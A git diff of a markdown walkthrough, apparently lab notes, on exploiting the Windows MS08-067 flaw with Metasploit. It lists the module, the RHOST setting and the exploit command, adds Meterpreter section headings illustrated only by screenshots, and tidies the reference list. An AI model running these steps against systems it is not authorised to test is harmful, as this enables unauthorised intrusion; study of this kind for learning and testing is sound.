--- a/ms08067.md
+++ b/ms08067.md
@@ -24,13 +24,9 @@ The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP
 msf > use exploit/windows/smb/ms08_067_netapi
 ```
 
-
-
 ```
 msf > show options
 ```
-
-
 
 ```
 msf > set RHOST <Target IP Address>
@@ -38,29 +34,41 @@ msf > set RHOST <Target IP Address>
 
 ![](/assets/ms08_exploit.png)
 
-
-
 ```
 msf > exploit
 ```
 
+#### Meterpreter - Navigating
+
+## ![](/assets/Nav1.png)
 
 
 
+![](/assets/nav2.png)
 
 
 
-## 
+![](/assets/nav3.png)
 
-## 
+
+
+![](/assets/nav4.png)
+
+
+
+#### Meterpreter - Hash the File
+
+![](/assets/ms08_067_HashFile.png)
+
+
 
 ## 
 
 ## References
 
-BUGTRAQ:20081026 Windows RPC MS08-067 FAQ document released
-
+* BUGTRAQ:20081026 Windows RPC MS08-067 FAQ document released
 * [URL:http://www.securityfocus.com/archive/1/archive/1/497808/100/0/threaded](http://www.securityfocus.com/archive/1/archive/1/497808/100/0/threaded)
+
 * BUGTRAQ:20081027 Windows RPC MS08-067 FAQ document updated
 * [URL:http://www.securityfocus.com/archive/1/archive/1/497816/100/0/threaded](http://www.securityfocus.com/archive/1/archive/1/497816/100/0/threaded)
 * EXPLOIT-DB:6824
